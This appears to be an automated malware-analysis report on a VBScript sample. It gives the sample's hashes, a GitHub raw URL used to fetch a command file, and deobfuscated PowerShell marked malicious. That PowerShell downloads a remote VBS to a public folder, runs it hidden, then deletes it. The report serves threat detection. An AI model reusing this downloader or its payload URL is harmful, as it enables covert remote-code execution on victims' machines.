|
Hash | Hash Value |
|---|---|
| MD5 | 9e9a2f6ef6b242edfccfece4cade10ef
|
| Sha1 | 11a355c4173f3f5bc1d3a1fa0e04e0a266a7ba4e
|
| Sha256 | 0faf7067e45c2a3289cc58532cc1e31c976d84ea943bbe613f7c95bbc7d715f6
|
| Sha384 | 9679df132abe8cc3e938cb9b33a67f38c9e49f09a6f82b649668fd1ad53633feac753ffed1473e6bff2b65fc0b22fefa
|
| Sha512 | 305e3e2280a849eb7e7531150604a06bcf3e633263dbf2980851af7a5760286c5b21bcb4628d494c16e23a05ea78305fd617faf0f4560c2e646139098014c6ed
|
| SSDeep | 24:9A+ssSZh+J4QGMG2k+AcD0rR6nG5CtRMWfej8qWY/Van:eWe+6Qlzd0ruG8tRPfeL/E
|
| TLSH | E111EF0B6D18D4B64970C0875C64A91DEDC3A413400E5DB1F21D480C9F397BAA5C1C97
|
|
Name0 | Value |
|---|---|
| URLs in VB Code - #1 | https://raw.githubusercontent.com/respaldorere/respaldomaximo/main/cmd.txt |
| Deobfuscated PowerShell | " & Chr(34) & " try { Invoke-WebRequest -uri "" & trimmedUrl & "" -OutFile "C:\Users\Public\script1.vbs" Start-Process -WindowStyle "Hidden" "wscript.exe" "C:\Users\Public\script1.vbs" Start-Sleep -s 10 Remove-Item "C:\Users\Public\script1.vbs" -Force } catch { } " & Chr(34) runShell.Run psCmd, 0, False success = True Exit For End If End If WScript.Sleep 3000 Next" |
| Deobfuscated PowerShell | "try { iwr -uri '" |
|
Name0 | Value | Location |
|---|---|---|
| URLs in VB Code - #1 | https://raw.githubusercontent.com/respaldorere/respaldomaximo/main/cmd.txt |
9e9a2f6ef6b242edfccfece4cade10ef |
| Deobfuscated PowerShell | " & Chr(34) & " try { Invoke-WebRequest -uri "" & trimmedUrl & "" -OutFile "C:\Users\Public\script1.vbs" Start-Process -WindowStyle "Hidden" "wscript.exe" "C:\Users\Public\script1.vbs" Start-Sleep -s 10 Remove-Item "C:\Users\Public\script1.vbs" -Force } catch { } " & Chr(34) runShell.Run psCmd, 0, False success = True Exit For End If End If WScript.Sleep 3000 Next" Malicious |
9e9a2f6ef6b242edfccfece4cade10ef > [PowerShell Command] |
| Deobfuscated PowerShell | "try { iwr -uri '" Malicious |
9e9a2f6ef6b242edfccfece4cade10ef > 9e9a2f6ef6b242edfccfece4cade10ef.deobfuscated.vbs > [Command #0] > [PowerShell Command] |